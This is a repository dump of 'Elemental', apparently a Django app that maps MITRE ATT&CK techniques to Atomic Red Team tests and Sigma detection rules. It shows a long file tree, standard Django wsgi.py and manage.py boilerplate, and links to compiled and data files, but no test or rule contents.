├── LICENSE
├── README.md
├── elemental
├── __pycache__
│ ├── atomics_imports.cpython-36.pyc
│ ├── attack_imports.cpython-36.pyc
│ ├── attackcti_exporter.cpython-36.pyc
│ ├── import_abbrvs.cpython-36.pyc
│ └── sigma_rule_imports.cpython-36.pyc
├── db.sqlite3
├── elemental
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-36.pyc
│ │ ├── settings.cpython-36.pyc
│ │ ├── urls.cpython-36.pyc
│ │ └── wsgi.cpython-36.pyc
│ ├── settings.py
│ ├── urls.py
│ └── wsgi.py
├── manage.py
├── matrix
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-36.pyc
│ │ ├── admin.cpython-36.pyc
│ │ ├── forms.cpython-36.pyc
│ │ ├── models.cpython-36.pyc
│ │ ├── urls.cpython-36.pyc
│ │ └── views.cpython-36.pyc
│ ├── admin.py
│ ├── apps.py
│ ├── forms.py
│ ├── migrations
│ │ ├── 0001_initial.py
│ │ ├── __init__.py
│ │ └── __pycache__
│ │ │ ├── 0001_initial.cpython-36.pyc
│ │ │ └── __init__.cpython-36.pyc
│ ├── models.py
│ ├── static
│ │ └── matrix
│ │ │ ├── elemental.png
│ │ │ └── style.css
│ ├── templates
│ │ ├── base_generic.html
│ │ ├── base_generic_elements.html
│ │ ├── base_generic_no_header.html
│ │ ├── elemental.png
│ │ ├── index.html
│ │ └── matrix
│ │ │ ├── TacticTemplate.html
│ │ │ ├── addSigma.html
│ │ │ ├── addTechnique.html
│ │ │ ├── addnote.html
│ │ │ ├── atomic.html
│ │ │ ├── noteForm.html
│ │ │ ├── note_detail.html
│ │ │ ├── note_form.html
│ │ │ ├── tactic_detail.html
│ │ │ ├── tactic_list.html
│ │ │ └── technique.html
│ ├── templatetags
│ │ ├── __init__.py
│ │ ├── __pycache__
│ │ │ ├── __init__.cpython-36.pyc
│ │ │ └── short_name.cpython-36.pyc
│ │ └── short_name.py
│ ├── tests.py
│ ├── urls.py
│ └── views.py
├── media
│ ├── atomics
│ │ ├── T1002.md
│ │ ├── T1002.yaml
│ │ ├── T1003.md
│ │ ├── T1003.yaml
│ │ ├── T1004.md
│ │ ├── T1004.yaml
│ │ ├── T1005.md
│ │ ├── T1005.yaml
│ │ ├── T1007.md
│ │ ├── T1007.yaml
│ │ ├── T1009.md
│ │ ├── T1009.yaml
│ │ ├── T1010.md
│ │ ├── T1010.yaml
│ │ ├── T1012.md
│ │ ├── T1012.yaml
│ │ ├── T1014.md
│ │ ├── T1014.yaml
│ │ ├── T1015.md
│ │ ├── T1015.yaml
│ │ ├── T1016.md
│ │ ├── T1016.yaml
│ │ ├── T1018.md
│ │ ├── T1018.yaml
│ │ ├── T1022.md
│ │ ├── T1022.yaml
│ │ ├── T1023.md
│ │ ├── T1023.yaml
│ │ ├── T1027.md
│ │ ├── T1027.yaml
│ │ ├── T1028.md
│ │ ├── T1028.yaml
│ │ ├── T1030.md
│ │ ├── T1030.yaml
│ │ ├── T1031.md
│ │ ├── T1031.yaml
│ │ ├── T1033.md
│ │ ├── T1033.yaml
│ │ ├── T1035.md
│ │ ├── T1035.yaml
│ │ ├── T1036.md
│ │ ├── T1036.yaml
│ │ ├── T1037.md
│ │ ├── T1037.yaml
│ │ ├── T1038.md
│ │ ├── T1038.yaml
│ │ ├── T1040.md
│ │ ├── T1040.yaml
│ │ ├── T1042.md
│ │ ├── T1042.yaml
│ │ ├── T1044.md
│ │ ├── T1044.yaml
│ │ ├── T1046.md
│ │ ├── T1046.yaml
│ │ ├── T1047.md
│ │ ├── T1047.yaml
│ │ ├── T1048.md
│ │ ├── T1048.yaml
│ │ ├── T1049.md
│ │ ├── T1049.yaml
│ │ ├── T1050.md
│ │ ├── T1050.yaml
│ │ ├── T1053.md
│ │ ├── T1053.yaml
│ │ ├── T1055.md
│ │ ├── T1055.yaml
│ │ ├── T1056.md
│ │ ├── T1056.yaml
│ │ ├── T1057.md
│ │ ├── T1057.yaml
│ │ ├── T1058.md
│ │ ├── T1058.yaml
│ │ ├── T1059.md
│ │ ├── T1059.yaml
│ │ ├── T1060.md
│ │ ├── T1060.yaml
│ │ ├── T1062.md
│ │ ├── T1062.yaml
│ │ ├── T1063.md
│ │ ├── T1063.yaml
│ │ ├── T1064.md
│ │ ├── T1064.yaml
│ │ ├── T1065.md
│ │ ├── T1065.yaml
│ │ ├── T1069.md
│ │ ├── T1069.yaml
│ │ ├── T1070.md
│ │ ├── T1070.yaml
│ │ ├── T1071.md
│ │ ├── T1071.yaml
│ │ ├── T1073.md
│ │ ├── T1073.yaml
│ │ ├── T1074.md
│ │ ├── T1074.yaml
│ │ ├── T1075.md
│ │ ├── T1075.yaml
│ │ ├── T1076.md
│ │ ├── T1076.yaml
│ │ ├── T1077.md
│ │ ├── T1077.yaml
│ │ ├── T1081.md
│ │ ├── T1081.yaml
│ │ ├── T1082.md
│ │ ├── T1082.yaml
│ │ ├── T1083.md
│ │ ├── T1083.yaml
│ │ ├── T1084.md
│ │ ├── T1084.yaml
│ │ ├── T1085.md
│ │ ├── T1085.yaml
│ │ ├── T1086.md
│ │ ├── T1086.yaml
│ │ ├── T1087.md
│ │ ├── T1087.yaml
│ │ ├── T1088.md
│ │ ├── T1088.yaml
│ │ ├── T1089.md
│ │ ├── T1089.yaml
│ │ ├── T1090.md
│ │ ├── T1090.yaml
│ │ ├── T1096.md
│ │ ├── T1096.yaml
│ │ ├── T1097.md
│ │ ├── T1097.yaml
│ │ ├── T1098.md
│ │ ├── T1098.yaml
│ │ ├── T1099.md
│ │ ├── T1099.yaml
│ │ ├── T1100.md
│ │ ├── T1100.yaml
│ │ ├── T1101.md
│ │ ├── T1101.yaml
│ │ ├── T1102.md
│ │ ├── T1102.yaml
│ │ ├── T1103.md
│ │ ├── T1103.yaml
│ │ ├── T1105.md
│ │ ├── T1105.yaml
│ │ ├── T1107.md
│ │ ├── T1107.yaml
│ │ ├── T1110.md
│ │ ├── T1110.yaml
│ │ ├── T1112.md
│ │ ├── T1112.yaml
│ │ ├── T1113.md
│ │ ├── T1113.yaml
│ │ ├── T1114.md
│ │ ├── T1114.yaml
│ │ ├── T1115.md
│ │ ├── T1115.yaml
│ │ ├── T1117.md
│ │ ├── T1117.yaml
│ │ ├── T1118.md
│ │ ├── T1118.yaml
│ │ ├── T1119.md
│ │ ├── T1119.yaml
│ │ ├── T1121.md
│ │ ├── T1121.yaml
│ │ ├── T1122.md
│ │ ├── T1122.yaml
│ │ ├── T1123.md
│ │ ├── T1123.yaml
│ │ ├── T1124.md
│ │ ├── T1124.yaml
│ │ ├── T1126.md
│ │ ├── T1126.yaml
│ │ ├── T1127.md
│ │ ├── T1127.yaml
│ │ ├── T1128.md
│ │ ├── T1128.yaml
│ │ ├── T1130.md
│ │ ├── T1130.yaml
│ │ ├── T1132.md
│ │ ├── T1132.yaml
│ │ ├── T1134.md
│ │ ├── T1134.yaml
│ │ ├── T1135.md
│ │ ├── T1135.yaml
│ │ ├── T1136.md
│ │ ├── T1136.yaml
│ │ ├── T1137.md
│ │ ├── T1137.yaml
│ │ ├── T1138.md
│ │ ├── T1138.yaml
│ │ ├── T1139.md
│ │ ├── T1139.yaml
│ │ ├── T1140.md
│ │ ├── T1140.yaml
│ │ ├── T1141.md
│ │ ├── T1141.yaml
│ │ ├── T1142.md
│ │ ├── T1142.yaml
│ │ ├── T1143.md
│ │ ├── T1143.yaml
│ │ ├── T1144.md
│ │ ├── T1144.yaml
│ │ ├── T1145.md
│ │ ├── T1145.yaml
│ │ ├── T1146.md
│ │ ├── T1146.yaml
│ │ ├── T1147.md
│ │ ├── T1147.yaml
│ │ ├── T1148.md
│ │ ├── T1148.yaml
│ │ ├── T1150.md
│ │ ├── T1150.yaml
│ │ ├── T1151.md
│ │ ├── T1151.yaml
│ │ ├── T1152.md
│ │ ├── T1152.yaml
│ │ ├── T1153.md
│ │ ├── T1153.yaml
│ │ ├── T1154.md
│ │ ├── T1154.yaml
│ │ ├── T1155.md
│ │ ├── T1155.yaml
│ │ ├── T1156.md
│ │ ├── T1156.yaml
│ │ ├── T1158.md
│ │ ├── T1158.yaml
│ │ ├── T1159.md
│ │ ├── T1159.yaml
│ │ ├── T1160.md
│ │ ├── T1160.yaml
│ │ ├── T1163.md
│ │ ├── T1163.yaml
│ │ ├── T1164.md
│ │ ├── T1164.yaml
│ │ ├── T1165.md
│ │ ├── T1165.yaml
│ │ ├── T1166.md
│ │ ├── T1166.yaml
│ │ ├── T1168.md
│ │ ├── T1168.yaml
│ │ ├── T1169.md
│ │ ├── T1169.yaml
│ │ ├── T1170.md
│ │ ├── T1170.yaml
│ │ ├── T1173.md
│ │ ├── T1173.yaml
│ │ ├── T1174.md
│ │ ├── T1174.yaml
│ │ ├── T1176.md
│ │ ├── T1176.yaml
│ │ ├── T1179.md
│ │ ├── T1179.yaml
│ │ ├── T1180.md
│ │ ├── T1180.yaml
│ │ ├── T1183.md
│ │ ├── T1183.yaml
│ │ ├── T1191.md
│ │ ├── T1191.yaml
│ │ ├── T1193.md
│ │ ├── T1193.yaml
│ │ ├── T1196.md
│ │ ├── T1196.yaml
│ │ ├── T1197.md
│ │ ├── T1197.yaml
│ │ ├── T1201.md
│ │ ├── T1201.yaml
│ │ ├── T1202.md
│ │ ├── T1202.yaml
│ │ ├── T1206.md
│ │ ├── T1206.yaml
│ │ ├── T1207.md
│ │ ├── T1207.yaml
│ │ ├── T1208.md
│ │ ├── T1208.yaml
│ │ ├── T1214.md
│ │ ├── T1214.yaml
│ │ ├── T1215.md
│ │ ├── T1215.yaml
│ │ ├── T1216.md
│ │ ├── T1216.yaml
│ │ ├── T1217.md
│ │ ├── T1217.yaml
│ │ ├── T1218.md
│ │ ├── T1218.yaml
│ │ ├── T1220.md
│ │ ├── T1220.yaml
│ │ ├── T1222.md
│ │ ├── T1222.yaml
│ │ ├── T1223.md
│ │ ├── T1223.yaml
│ │ ├── T1482.md
│ │ ├── T1482.yaml
│ │ ├── T1485.md
│ │ ├── T1485.yaml
│ │ ├── T1489.md
│ │ ├── T1489.yaml
│ │ ├── T1490.md
│ │ ├── T1490.yaml
│ │ ├── T1496.md
│ │ ├── T1496.yaml
│ │ ├── T1500.md
│ │ ├── T1500.yaml
│ │ ├── T1501.md
│ │ ├── T1501.yaml
│ │ ├── T1504.md
│ │ ├── T1504.yaml
│ │ ├── T1505.md
│ │ ├── T1505.yaml
│ │ ├── T1518.md
│ │ ├── T1518.yaml
│ │ ├── T1529.md
│ │ ├── T1529.yaml
│ │ ├── T1531.md
│ │ └── T1531.yaml
│ ├── elemental.png
│ └── sigma_rules
│ │ ├── apt_apt29_thinktanks.yml
│ │ ├── apt_apt29_tor.yml
│ │ ├── apt_babyshark.yml
│ │ ├── apt_bear_activity_gtr19.yml
│ │ ├── apt_carbonpaper_turla.yml
│ │ ├── apt_chafer_mar18.yml
│ │ ├── apt_cloudhopper.yml
│ │ ├── apt_empiremonkey.yml
│ │ ├── apt_equationgroup_dll_u_load.yml
│ │ ├── apt_equationgroup_lnx.yml
│ │ ├── apt_hurricane_panda.yml
│ │ ├── apt_judgement_panda_gtr19.yml
│ │ ├── apt_oceanlotus_registry.yml
│ │ ├── apt_pandemic.yml
│ │ ├── apt_slingshot.yml
│ │ ├── apt_sofacy.yml
│ │ ├── apt_stonedrill.yml
│ │ ├── apt_ta17_293a_ps.yml
│ │ ├── apt_tropictrooper.yml
│ │ ├── apt_turla_commands.yml
│ │ ├── apt_turla_service_png.yml
│ │ ├── apt_unidentified_nov_18.yml
│ │ ├── apt_zxshell.yml
│ │ ├── av_exploiting.yml
│ │ ├── av_password_dumper.yml
│ │ ├── av_webshell.yml
│ │ ├── crime_fireball.yml
│ │ ├── lnx_auditd_alter_bash_profile.yml
│ │ ├── lnx_auditd_masquerading_crond.yml
│ │ ├── lnx_auditd_user_discovery.yml
│ │ ├── lnx_auditd_web_rce.yml
│ │ ├── lnx_data_compressed.yml
│ │ ├── lnx_network_sniffing.yml
│ │ ├── lnx_shell_clear_cmd_history.yml
│ │ ├── lnx_shell_priv_esc_prep.yml
│ │ ├── lnx_sudo_cve_2019_14287.yml
│ │ ├── net_dns_c2_detection.yml
│ │ ├── net_susp_dns_txt_exec_strings.yml
│ │ ├── powershell_data_compressed.yml
│ │ ├── powershell_downgrade_attack.yml
│ │ ├── powershell_exe_calling_ps.yml
│ │ ├── powershell_malicious_commandlets.yml
│ │ ├── powershell_malicious_keywords.yml
│ │ ├── powershell_ntfs_ads_access.yml
│ │ ├── powershell_prompt_credentials.yml
│ │ ├── powershell_psattack.yml
│ │ ├── powershell_shellcode_b64.yml
│ │ ├── powershell_suspicious_download.yml
│ │ ├── powershell_suspicious_invocation_generic.yml
│ │ ├── powershell_suspicious_invocation_specific.yml
│ │ ├── powershell_suspicious_keywords.yml
│ │ ├── powershell_winlogon_helper_dll.yml
│ │ ├── proxy_cobalt_amazon.yml
│ │ ├── proxy_cobalt_ocsp.yml
│ │ ├── proxy_cobalt_onedrive.yml
│ │ ├── proxy_raw_paste_service_access.yml
│ │ ├── sysmon_ads_executable.yml
│ │ ├── sysmon_cactustorch.yml
│ │ ├── sysmon_cmstp_execution.yml
│ │ ├── sysmon_cobaltstrike_process_injection.yml
│ │ ├── sysmon_dhcp_calloutdll.yml
│ │ ├── sysmon_dns_serverlevelplugindll.yml
│ │ ├── sysmon_ghostpack_safetykatz.yml
│ │ ├── sysmon_logon_scripts_userinitmprlogonscript.yml
│ │ ├── sysmon_lsass_memdump.yml
│ │ ├── sysmon_mal_namedpipes.yml
│ │ ├── sysmon_malware_backconnect_ports.yml
│ │ ├── sysmon_malware_verclsid_shellcode.yml
│ │ ├── sysmon_mimikatz_detection_lsass.yml
│ │ ├── sysmon_mimikatz_inmemory_detection.yml
│ │ ├── sysmon_mimikatz_trough_winrm.yml
│ │ ├── sysmon_password_dumper_lsass.yml
│ │ ├── sysmon_powershell_exploit_scripts.yml
│ │ ├── sysmon_powershell_network_connection.yml
│ │ ├── sysmon_quarkspw_filedump.yml
│ │ ├── sysmon_rdp_reverse_tunnel.yml
│ │ ├── sysmon_registry_persistence_key_linking.yml
│ │ ├── sysmon_renamed_procdump.yml
│ │ ├── sysmon_rundll32_net_connections.yml
│ │ ├── sysmon_ssp_added_lsa_config.yml
│ │ ├── sysmon_stickykey_like_backdoor.yml
│ │ ├── sysmon_susp_download_run_key.yml
│ │ ├── sysmon_susp_driver_load.yml
│ │ ├── sysmon_susp_file_characteristics.yml
│ │ ├── sysmon_susp_image_load.yml
│ │ ├── sysmon_susp_lsass_dll_load.yml
│ │ ├── sysmon_susp_powershell_rundll32.yml
│ │ ├── sysmon_susp_rdp.yml
│ │ ├── sysmon_susp_reg_persist_explorer_run.yml
│ │ ├── sysmon_susp_run_key_img_folder.yml
│ │ ├── sysmon_svchost_dll_search_order_hijack.yml
│ │ ├── sysmon_uac_bypass_eventvwr.yml
│ │ ├── sysmon_uac_bypass_sdclt.yml
│ │ ├── sysmon_webshell_creation_detect.yml
│ │ ├── sysmon_win_binary_github_com.yml
│ │ ├── sysmon_win_binary_susp_com.yml
│ │ ├── sysmon_win_reg_persistence.yml
│ │ ├── sysmon_wmi_event_subscription.yml
│ │ ├── sysmon_wmi_persistence_commandline_event_consumer.yml
│ │ ├── sysmon_wmi_persistence_script_event_consumer_write.yml
│ │ ├── sysmon_wmi_susp_scripting.yml
│ │ ├── web_cve_2018_2894_weblogic_exploit.yml
│ │ ├── win_GPO_scheduledtasks.yml
│ │ ├── win_account_discovery.yml
│ │ ├── win_admin_rdp_login.yml
│ │ ├── win_admin_share_access.yml
│ │ ├── win_alert_active_directory_user_control.yml
│ │ ├── win_alert_ad_user_backdoors.yml
│ │ ├── win_alert_enable_weak_encryption.yml
│ │ ├── win_alert_lsass_access.yml
│ │ ├── win_alert_mimikatz_keywords.yml
│ │ ├── win_alert_ruler.yml
│ │ ├── win_apt_bluemashroom.yml
│ │ ├── win_atsvc_task.yml
│ │ ├── win_attrib_hiding_files.yml
│ │ ├── win_bypass_squiblytwo.yml
│ │ ├── win_change_default_file_association.yml
│ │ ├── win_cmdkey_recon.yml
│ │ ├── win_cmstp_com_object_access.yml
│ │ ├── win_control_panel_item.yml
│ │ ├── win_data_compressed_with_rar.yml
│ │ ├── win_dcsync.yml
│ │ ├── win_disable_event_logging.yml
│ │ ├── win_encoded_frombase64string.yml
│ │ ├── win_encoded_iex.yml
│ │ ├── win_etw_trace_evasion.yml
│ │ ├── win_exploit_cve_2015_1641.yml
│ │ ├── win_exploit_cve_2017_0261.yml
│ │ ├── win_exploit_cve_2017_11882.yml
│ │ ├── win_exploit_cve_2017_8759.yml
│ │ ├── win_exploit_cve_2019_1378.yml
│ │ ├── win_exploit_cve_2019_1388.yml
│ │ ├── win_hack_rubeus.yml
│ │ ├── win_hack_smbexec.yml
│ │ ├── win_hwp_exploits.yml
│ │ ├── win_impacket_lateralization.yml
│ │ ├── win_impacket_secretdump.yml
│ │ ├── win_install_reg_debugger_backdoor.yml
│ │ ├── win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml
│ │ ├── win_lethalhta.yml
│ │ ├── win_lm_namedpipe.yml
│ │ ├── win_local_system_owner_account_discovery.yml
│ │ ├── win_mal_adwind.yml
│ │ ├── win_mal_creddumper.yml
│ │ ├── win_mal_service_installs.yml
│ │ ├── win_mal_ursnif.yml
│ │ ├── win_mal_wceaux_dll.yml
│ │ ├── win_malware_dridex.yml
│ │ ├── win_malware_notpetya.yml
│ │ ├── win_malware_script_dropper.yml
│ │ ├── win_mavinject_proc_inj.yml
│ │ ├── win_mmc_spawn_shell.yml
│ │ ├── win_mshta_spawn_shell.yml
│ │ ├── win_net_ntlm_downgrade.yml
│ │ ├── win_netsh_fw_add.yml
│ │ ├── win_netsh_packet_capture.yml
│ │ ├── win_netsh_port_fwd.yml
│ │ ├── win_netsh_port_fwd_3389.yml
│ │ ├── win_network_sniffing.yml
│ │ ├── win_office_shell.yml
│ │ ├── win_office_spawn_exe_from_users_directory.yml
│ │ ├── win_overpass_the_hash.yml
│ │ ├── win_pass_the_hash.yml
│ │ ├── win_pass_the_hash_2.yml
│ │ ├── win_plugx_susp_exe_locations.yml
│ │ ├── win_possible_applocker_bypass.yml
│ │ ├── win_powershell_amsi_bypass.yml
│ │ ├── win_powershell_b64_shellcode.yml
│ │ ├── win_powershell_dll_execution.yml
│ │ ├── win_powershell_download.yml
│ │ ├── win_powershell_suspicious_parameter_variation.yml
│ │ ├── win_powershell_xor_commandline.yml
│ │ ├── win_powersploit_empire_schtasks.yml
│ │ ├── win_proc_wrong_parent.yml
│ │ ├── win_process_creation_bitsadmin_download.yml
│ │ ├── win_psexesvc_start.yml
│ │ ├── win_query_registry.yml
│ │ ├── win_rare_schtask_creation.yml
│ │ ├── win_rare_schtasks_creations.yml
│ │ ├── win_rare_service_installs.yml
│ │ ├── win_rdp_bluekeep_poc_scanner.yml
│ │ ├── win_rdp_localhost_login.yml
│ │ ├── win_rdp_potential_cve-2019-0708.yml
│ │ ├── win_rdp_reverse_tunnel.yml
│ │ ├── win_renamed_binary.yml
│ │ ├── win_renamed_paexec.yml
│ │ ├── win_sdbinst_shim_persistence.yml
│ │ ├── win_service_execution.yml
│ │ ├── win_shell_spawn_susp_program.yml
│ │ ├── win_spn_enum.yml
│ │ ├── win_susp_add_sid_history.yml
│ │ ├── win_susp_backup_delete.yml
│ │ ├── win_susp_bcdedit.yml
│ │ ├── win_susp_bginfo.yml
│ │ ├── win_susp_calc.yml
│ │ ├── win_susp_cdb.yml
│ │ ├── win_susp_certutil_command.yml
│ │ ├── win_susp_cli_escape.yml
│ │ ├── win_susp_cmd_http_appdata.yml
│ │ ├── win_susp_codeintegrity_check_failure.yml
│ │ ├── win_susp_commands_recon_activity.yml
│ │ ├── win_susp_compression_params.yml
│ │ ├── win_susp_comsvcs_procdump.yml
│ │ ├── win_susp_control_dll_load.yml
│ │ ├── win_susp_csc.yml
│ │ ├── win_susp_csc_folder.yml
│ │ ├── win_susp_devtoolslauncher.yml
│ │ ├── win_susp_dhcp_config.yml
│ │ ├── win_susp_dhcp_config_failed.yml
│ │ ├── win_susp_dns_config.yml
│ │ ├── win_susp_dnx.yml
│ │ ├── win_susp_double_extension.yml
│ │ ├── win_susp_dsrm_password_change.yml
│ │ ├── win_susp_dxcap.yml
│ │ ├── win_susp_eventlog_clear.yml
│ │ ├── win_susp_eventlog_cleared.yml
│ │ ├── win_susp_exec_folder.yml
│ │ ├── win_susp_execution_path.yml
│ │ ├── win_susp_execution_path_webserver.yml
│ │ ├── win_susp_failed_logon_reasons.yml
│ │ ├── win_susp_failed_logons_single_source.yml
│ │ ├── win_susp_gup.yml
│ │ ├── win_susp_interactive_logons.yml
│ │ ├── win_susp_iss_module_install.yml
│ │ ├── win_susp_kerberos_manipulation.yml
│ │ ├── win_susp_lsass_dump.yml
│ │ ├── win_susp_mshta_execution.yml
│ │ ├── win_susp_msiexec_cwd.yml
│ │ ├── win_susp_msmpeng_crash.yml
│ │ ├── win_susp_msoffice.yml
│ │ ├── win_susp_net_recon_activity.yml
│ │ ├── win_susp_ntdsutil.yml
│ │ ├── win_susp_ntlm_auth.yml
│ │ ├── win_susp_odbcconf.yml
│ │ ├── win_susp_openwith.yml
│ │ ├── win_susp_outlook.yml
│ │ ├── win_susp_outlook_temp.yml
│ │ ├── win_susp_ping_hex_ip.yml
│ │ ├── win_susp_powershell_empire_launch.yml
│ │ ├── win_susp_powershell_empire_uac_bypass.yml
│ │ ├── win_susp_powershell_enc_cmd.yml
│ │ ├── win_susp_powershell_hidden_b64_cmd.yml
│ │ ├── win_susp_powershell_parent_combo.yml
│ │ ├── win_susp_procdump.yml
│ │ ├── win_susp_prog_location_process_starts.yml
│ │ ├── win_susp_ps_appdata.yml
│ │ ├── win_susp_psexec.yml
│ │ ├── win_susp_psr_capture_screenshots.yml
│ │ ├── win_susp_rasdial_activity.yml
│ │ ├── win_susp_rc4_kerberos.yml
│ │ ├── win_susp_recon_activity.yml
│ │ ├── win_susp_regsvr32_anomalies.yml
│ │ ├── win_susp_rottenpotato.yml
│ │ ├── win_susp_run_locations.yml
│ │ ├── win_susp_rundll32_activity.yml
│ │ ├── win_susp_rundll32_by_ordinal.yml
│ │ ├── win_susp_sam_dump.yml
│ │ ├── win_susp_samr_pwset.yml
│ │ ├── win_susp_schtask_creation.yml
│ │ ├── win_susp_script_execution.yml
│ │ ├── win_susp_sdelete.yml
│ │ ├── win_susp_security_eventlog_cleared.yml
│ │ ├── win_susp_svchost.yml
│ │ ├── win_susp_sysvol_access.yml
│ │ ├── win_susp_taskmgr_localsystem.yml
│ │ ├── win_susp_taskmgr_parent.yml
│ │ ├── win_susp_time_modification.yml
│ │ ├── win_susp_tscon_localsystem.yml
│ │ ├── win_susp_tscon_rdp_redirect.yml
│ │ ├── win_susp_vssadmin_ntds_activity.yml
│ │ ├── win_susp_whoami.yml
│ │ ├── win_susp_wmi_execution.yml
│ │ ├── win_susp_wmi_login.yml
│ │ ├── win_system_exe_anomaly.yml
│ │ ├── win_tool_psexec.yml
│ │ ├── win_usb_device_plugged.yml
│ │ ├── win_user_added_to_local_administrators.yml
│ │ ├── win_user_creation.yml
│ │ ├── win_vul_java_remote_debugging.yml
│ │ ├── win_webshell_detection.yml
│ │ ├── win_webshell_spawn.yml
│ │ ├── win_win10_sched_task_0day.yml
│ │ ├── win_wmi_backdoor_exchange_transport_agent.yml
│ │ ├── win_wmi_persistence.yml
│ │ ├── win_wmi_persistence_script_event_consumer.yml
│ │ ├── win_wmi_spwns_powershell.yml
│ │ ├── win_workflow_compiler.yml
│ │ └── win_xsl_script_processing.yml
└── requirements.txt
└── images
├── 97.png
├── Atomic.png
├── AtomicYaml.png
├── Sigma.png
├── Technique.png
└── elementalUI.png
/elemental/__pycache__/atomics_imports.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/__pycache__/atomics_imports.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/__pycache__/attack_imports.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/__pycache__/attack_imports.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/__pycache__/attackcti_exporter.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/__pycache__/attackcti_exporter.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/__pycache__/import_abbrvs.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/__pycache__/import_abbrvs.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/__pycache__/sigma_rule_imports.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/__pycache__/sigma_rule_imports.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/db.sqlite3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/db.sqlite3
--------------------------------------------------------------------------------
/elemental/elemental/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/elemental/__init__.py
--------------------------------------------------------------------------------
/elemental/elemental/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/elemental/__pycache__/__init__.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/elemental/__pycache__/settings.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/elemental/__pycache__/settings.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/elemental/__pycache__/urls.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/elemental/__pycache__/urls.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/elemental/__pycache__/wsgi.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/elemental/__pycache__/wsgi.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/elemental/wsgi.py:
--------------------------------------------------------------------------------
1 | """
2 | WSGI config for elemental project.
3 |
4 | It exposes the WSGI callable as a module-level variable named ``application``.
5 |
6 | For more information on this file, see
7 | https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
8 | """
9 |
10 | import os
11 |
12 | from django.core.wsgi import get_wsgi_application
13 |
14 | os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'elemental.settings')
15 |
16 | application = get_wsgi_application()
17 |
--------------------------------------------------------------------------------
/elemental/manage.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | """Django's command-line utility for administrative tasks."""
3 | import os
4 | import sys
5 |
6 |
7 | def main():
8 | os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'elemental.settings')
9 | try:
10 | from django.core.management import execute_from_command_line
11 | except ImportError as exc:
12 | raise ImportError(
13 | "Couldn't import Django. Are you sure it's installed and "
14 | "available on your PYTHONPATH environment variable? Did you "
15 | "forget to activate a virtual environment?"
16 | ) from exc
17 | execute_from_command_line(sys.argv)
18 |
19 |
20 | if __name__ == '__main__':
21 | main()
22 |
--------------------------------------------------------------------------------
/elemental/matrix/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/__init__.py
--------------------------------------------------------------------------------
/elemental/matrix/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/__pycache__/__init__.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/__pycache__/admin.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/__pycache__/admin.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/__pycache__/forms.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/__pycache__/forms.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/__pycache__/models.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/__pycache__/models.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/__pycache__/urls.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/__pycache__/urls.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/__pycache__/views.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/__pycache__/views.cpython-36.pyc
